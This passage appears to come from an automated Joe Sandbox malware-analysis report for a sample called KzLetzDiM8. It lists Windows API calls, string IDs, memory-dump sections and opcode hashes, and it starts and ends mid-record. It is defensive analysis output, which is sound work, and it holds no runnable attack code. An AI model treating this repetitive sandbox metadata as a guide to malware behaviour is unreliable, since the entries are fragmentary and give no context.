                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentVariable
                                                            • String ID: sfxcmd$sfxpar
                                                            • API String ID: 1431749950-3493335439
                                                            • Opcode ID: b429d3accdc954ab0f992bf1ea0573d1cc086eefbd2c4896f1ea358ca8475045
                                                            • Instruction ID: 5e4016e38c58a84b1d818642cb6bbb7c16346e82ce0660595d97a2ed64267b19
                                                            • Opcode Fuzzy Hash: b429d3accdc954ab0f992bf1ea0573d1cc086eefbd2c4896f1ea358ca8475045
                                                            • Instruction Fuzzy Hash: 33F0ECB241423CBBDB215F94AC0ABFA3799AF25B81B040455BF8996051DBF08980D6F0
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 001E9795
                                                            • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 001E97AD
                                                            • GetLastError.KERNEL32 ref: 001E97DF
                                                            • GetLastError.KERNEL32 ref: 001E97FE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$FileHandleRead
                                                            • String ID:
                                                            • API String ID: 2244327787-0
                                                            • Opcode ID: 0287b8e6f1366a14af1b5b7f17fa0b8c369e95394ec1449826c8e6586633a51c
                                                            • Instruction ID: f1f30a7fbe8d8654a8d07c57f42de7b981342c12d0b236d0a77d747c913d9cb3
                                                            • Opcode Fuzzy Hash: 0287b8e6f1366a14af1b5b7f17fa0b8c369e95394ec1449826c8e6586633a51c
                                                            • Instruction Fuzzy Hash: C811A531910A48EBDF209F67D804AAD37E9FB56370F108529F416C51A0D774DE48DF61
                                                            APIs
                                                              • Part of subcall function 002097E5: GetLastError.KERNEL32(?,00221098,00204674,00221098,?,?,002040EF,?,?,00221098), ref: 002097E9
                                                              • Part of subcall function 002097E5: _free.LIBCMT ref: 0020981C
                                                              • Part of subcall function 002097E5: SetLastError.KERNEL32(00000000,?,00221098), ref: 0020985D
                                                              • Part of subcall function 002097E5: _abort.LIBCMT ref: 00209863
                                                              • Part of subcall function 0020BB4E: _abort.LIBCMT ref: 0020BB80
                                                              • Part of subcall function 0020BB4E: _free.LIBCMT ref: 0020BBB4
                                                              • Part of subcall function 0020B7BB: GetOEMCP.KERNEL32(00000000,?,?,0020BA44,?), ref: 0020B7E6
                                                            • _free.LIBCMT ref: 0020BA9F
                                                            • _free.LIBCMT ref: 0020BAD5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorLast_abort
                                                            • String ID: p!
                                                            • API String ID: 2991157371-1659649850
                                                            • Opcode ID: aca3a1855d063805d7488d352447ecbfb48a88571af7acf69ad077d3667bb1bb
                                                            • Instruction ID: 1efb9710960a78a814330f96d37e772e2bdd806cd1c4ce0a9541fa78061821f7
                                                            • Opcode Fuzzy Hash: aca3a1855d063805d7488d352447ecbfb48a88571af7acf69ad077d3667bb1bb
                                                            • Instruction Fuzzy Hash: C231C431A1030AAFDB21DF68D845B99B7F5EF44324F214099E9049B2E3EB325D60CF50
                                                            APIs
                                                            • CreateThread.KERNELBASE(00000000,00010000,Function_00011160,?,00000000,00000000), ref: 001F1043
                                                            • SetThreadPriority.KERNEL32(?,00000000), ref: 001F108A
                                                              • Part of subcall function 001E6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001E6C54
                                                              • Part of subcall function 001E6DCB: _wcschr.LIBVCRUNTIME ref: 001E6E0A
                                                              • Part of subcall function 001E6DCB: _wcschr.LIBVCRUNTIME ref: 001E6E19
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
                                                            • String ID: CreateThread failed
                                                            • API String ID: 2706921342-3849766595
                                                            • Opcode ID: 1ff6431ed40a8171cd091d9fc3b8d2529f9ace602ca1a3cd0374b32f1420f1c0
                                                            • Instruction ID: f6d1e8b3840fac8a8acd47c04301a34d60149a2d937ffe478535b828c3cbc3e8
                                                            • Opcode Fuzzy Hash: 1ff6431ed40a8171cd091d9fc3b8d2529f9ace602ca1a3cd0374b32f1420f1c0
                                                            • Instruction Fuzzy Hash: 4101DBB534434DBBD3345E64BC55FBA7399EB70751F20002DFA8752284CFA1A9954624
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F5,?,?,?,?,001ED343,00000001,?,?,?,00000000,001F551D,?,?,?), ref: 001E9F9E
                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,001F551D,?,?,?,?,?,001F4FC7,?), ref: 001E9FE5
                                                            • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,001ED343,00000001,?,?), ref: 001EA011
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: FileWrite$Handle
                                                            • String ID:
                                                            • API String ID: 4209713984-0
                                                            • Opcode ID: daeb6114b3949dced051f5e968a7ea8226583c0f22927a2d4e9c76e8cd388c37
                                                            • Instruction ID: eeeed3d57211600d882393d7544993d8554b587e25a5cec152a9592ecd0f8c92
                                                            • Opcode Fuzzy Hash: daeb6114b3949dced051f5e968a7ea8226583c0f22927a2d4e9c76e8cd388c37
                                                            • Instruction Fuzzy Hash: 2B31C731204785AFDB14CF21D818BBE7BA5FF94715F04461DF94197290CB75AD48CBA2
                                                            APIs
                                                              • Part of subcall function 001EC27E: _wcslen.LIBCMT ref: 001EC284
                                                            • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,001EA175,?,00000001,00000000,?,?), ref: 001EA2D9
                                                            • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,001EA175,?,00000001,00000000,?,?), ref: 001EA30C
                                                            • GetLastError.KERNEL32(?,?,?,?,001EA175,?,00000001,00000000,?,?), ref: 001EA329
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectory$ErrorLast_wcslen
                                                            • String ID:
                                                            • API String ID: 2260680371-0
                                                            • Opcode ID: 348a6a252963e3921e5ecbc103d5c60c2623e2d6398bcb038c26fe7e14515a14
                                                            • Instruction ID: 52e9e52d2358e583119420632e89d2acd0150142994ddf6a5c02f5b7d747451d
                                                            • Opcode Fuzzy Hash: 348a6a252963e3921e5ecbc103d5c60c2623e2d6398bcb038c26fe7e14515a14
                                                            • Instruction Fuzzy Hash: CA01FC35100A94AAEF21EB775C49BFD3399BF1D780F848414FA01E6091DB64EA81C6B3
                                                            APIs
                                                            • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0020B8B8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Info
                                                            • String ID:
                                                            • API String ID: 1807457897-3916222277
                                                            • Opcode ID: 06818ba7139ea061024d8f26fd12c1284c01d576ab25b4ffcf92112e616fe1f7
                                                            • Instruction ID: fee6f9507618c2f118e6e163ef61b3eaff7854fac9fbe45d9f735d59580c9023
                                                            • Opcode Fuzzy Hash: 06818ba7139ea061024d8f26fd12c1284c01d576ab25b4ffcf92112e616fe1f7
                                                            • Instruction Fuzzy Hash: EB41F97051434C9EDF328E248C84BF6BBBDDB55304F1404EDE69A86183D375AA55CF60
                                                            APIs
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0020ACF8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID: @
                                                            • API String ID: 190572456-791083857
                                                            • Opcode ID: 436047b8520f429f1d3e1e1955d750dfd49cf1f1d46e6c7ad4d8a20119a17e95
                                                            • Instruction ID: 62b607c35b01ca85ccff211584d44d019486f8c294a089867562ab6dbaa23b9a
                                                            • Opcode Fuzzy Hash: 436047b8520f429f1d3e1e1955d750dfd49cf1f1d46e6c7ad4d8a20119a17e95
                                                            • Instruction Fuzzy Hash: E1110A33A203266FEF25DE18EC4499A7396ABC432075B8121FC15AB2D6DB30DC1187D2
                                                            APIs
                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,000000FF), ref: 0020AFDD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: String
                                                            • String ID: LCMapStringEx
                                                            • API String ID: 2568140703-3893581201
                                                            • Opcode ID: 9ad35e4fbf1ef0cd810e478ba02f5833bcf8860de9c72ddbadea5d3d1804ada3
                                                            • Instruction ID: d884079be85cb1d8cf16b76e83545aa38cfa3ca02c543c00fb7cc1711197b150
                                                            • Opcode Fuzzy Hash: 9ad35e4fbf1ef0cd810e478ba02f5833bcf8860de9c72ddbadea5d3d1804ada3
                                                            • Instruction Fuzzy Hash: B601293251420EBBCF02AF90DC09DEE7FA2EF59750F458154FE14261A1CA728971AB81
                                                            APIs
                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0020A56F), ref: 0020AF55
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: CountCriticalInitializeSectionSpin
                                                            • String ID: InitializeCriticalSectionEx
                                                            • API String ID: 2593887523-3084827643
                                                            • Opcode ID: 48bda4f7de83db3de7f02fbec33c396a5a6c83c1a2c062fb8794d21ee676035f
                                                            • Instruction ID: 163d25aa103fd1cf2d8df62fde5e66a1380ed4dd8448a2799ba1a832e456a786
                                                            • Opcode Fuzzy Hash: 48bda4f7de83db3de7f02fbec33c396a5a6c83c1a2c062fb8794d21ee676035f
                                                            • Instruction Fuzzy Hash: 06F0B43169530CBBCF119F50DC0ADEDBFA1EF65711B418055FD089A2A0DE724E219B85
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Alloc
                                                            • String ID: FlsAlloc
                                                            • API String ID: 2773662609-671089009
                                                            • Opcode ID: 7a289ade327212804ebe9c038c6ab498e8ecbc60f7fec95a9180eb53445e15a2
                                                            • Instruction ID: 43566d264c0329203139e928e6329966ff7417bec9f0bcb112ace7c0957b5c90
                                                            • Opcode Fuzzy Hash: 7a289ade327212804ebe9c038c6ab498e8ecbc60f7fec95a9180eb53445e15a2
                                                            • Instruction Fuzzy Hash: 52E0AB3069031C7BC700EB24EC0ADEEBBA4DFB5720B4100A9FC0597280CEB04E6186C6
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FEAF9
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: 3Ro
                                                            • API String ID: 1269201914-1492261280
                                                            • Opcode ID: a526acc37f9620f624ce833687064d0e9bdaa2c604ea8612a125467a428a98a9
                                                            • Instruction ID: 397447331e8608de0edbb41ac9d9c2983e9578c538d01bdcf607fd4d291e7d2f
                                                            • Opcode Fuzzy Hash: a526acc37f9620f624ce833687064d0e9bdaa2c604ea8612a125467a428a98a9
                                                            • Instruction Fuzzy Hash: B9B012CA2FE1CA7C320CB2405D02C37018CC1E1BE0330912FF601C40E5DEC00C520431
                                                            APIs
                                                              • Part of subcall function 0020B7BB: GetOEMCP.KERNEL32(00000000,?,?,0020BA44,?), ref: 0020B7E6
                                                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0020BA89,?,00000000), ref: 0020BC64
                                                            • GetCPInfo.KERNEL32(00000000,0020BA89,?,?,?,0020BA89,?,00000000), ref: 0020BC77
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: CodeInfoPageValid
                                                            • String ID:
                                                            • API String ID: 546120528-0
                                                            • Opcode ID: 3cb5b952e1ad22b1a8449aa5ad879396b061d5b7ed0786e104a14d68c5e81bfd
                                                            • Instruction ID: c4e82c6900d6206abcb0b248888cfa7ef9083da59d992d8a0f9a9c0299eaa6b2
                                                            • Opcode Fuzzy Hash: 3cb5b952e1ad22b1a8449aa5ad879396b061d5b7ed0786e104a14d68c5e81bfd
                                                            • Instruction Fuzzy Hash: 6A513370D203469EEB368F31C885ABAFBE5EF51300F18446ED4968B2E3D7749956CB90
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,001E9A50,?,?,00000000,?,?,001E8CBC,?), ref: 001E9BAB
                                                            • GetLastError.KERNEL32(?,00000000,001E8411,-00009570,00000000,000007F3), ref: 001E9BB6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            • Opcode ID: bd6603beb505b10864c5577e38b77c16cc6edca2b2eb58ce61f715af7eb94711
                                                            • Instruction ID: e2fe6a737aad28ec6e71fdea509ce5c6c421dbb6560a7e61c35894301cb13c55
                                                            • Opcode Fuzzy Hash: bd6603beb505b10864c5577e38b77c16cc6edca2b2eb58ce61f715af7eb94711
                                                            • Instruction Fuzzy Hash: 4941AF71604B81CFDB24DF16E5848AEB7E6FFE4310F198A2DE89183261D7B0AD448A91
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 001E1E55
                                                              • Part of subcall function 001E3BBA: __EH_prolog.LIBCMT ref: 001E3BBF
                                                            • _wcslen.LIBCMT ref: 001E1EFD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: H_prolog$_wcslen
                                                            • String ID:
                                                            • API String ID: 2838827086-0
                                                            • Opcode ID: a6c338856549e278a8b9947bc89764b94b628598ad374ad7aaee72916170e699
                                                            • Instruction ID: d27a6b6977fff8a908140b45690c44e9cb18939db15925317d3ab45e3e06539b
                                                            • Opcode Fuzzy Hash: a6c338856549e278a8b9947bc89764b94b628598ad374ad7aaee72916170e699
                                                            • Instruction Fuzzy Hash: 39313A71904649AFCF15DF99C945AEEBBF6BF58300F100069F845A7251CB325E55CB60
                                                            APIs
                                                            • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,001E73BC,?,?,?,00000000), ref: 001E9DBC
                                                            • SetFileTime.KERNELBASE(?,?,?,?), ref: 001E9E70
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: File$BuffersFlushTime
                                                            • String ID:
                                                            • API String ID: 1392018926-0
                                                            • Opcode ID: 3cbce4a1c19920adaa8a5d75739e42231529ef6aa73ace12df4336b720dc1560
                                                            • Instruction ID: aef7046cfada69f5015aad0471d53dd1960ad0bdd062a32376d1d456cd9d9d1d
                                                            • Opcode Fuzzy Hash: 3cbce4a1c19920adaa8a5d75739e42231529ef6aa73ace12df4336b720dc1560
                                                            • Instruction Fuzzy Hash: 3521D032248695EFC714DF76C891AABBBE4BF95304F08491CF8C587141D329E90C9B61
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,001E9F27,?,?,001E771A), ref: 001E96E6
                                                            • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,001E9F27,?,?,001E771A), ref: 001E9716
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 6dad84ae9ade63569f79049d00dcc0374c8b853707a7244f253ba3fa2be032b0
                                                            • Instruction ID: 784602eb0407879dd8a6b41eab14e6bd5816cde18c8e044389d6bdab858d0894
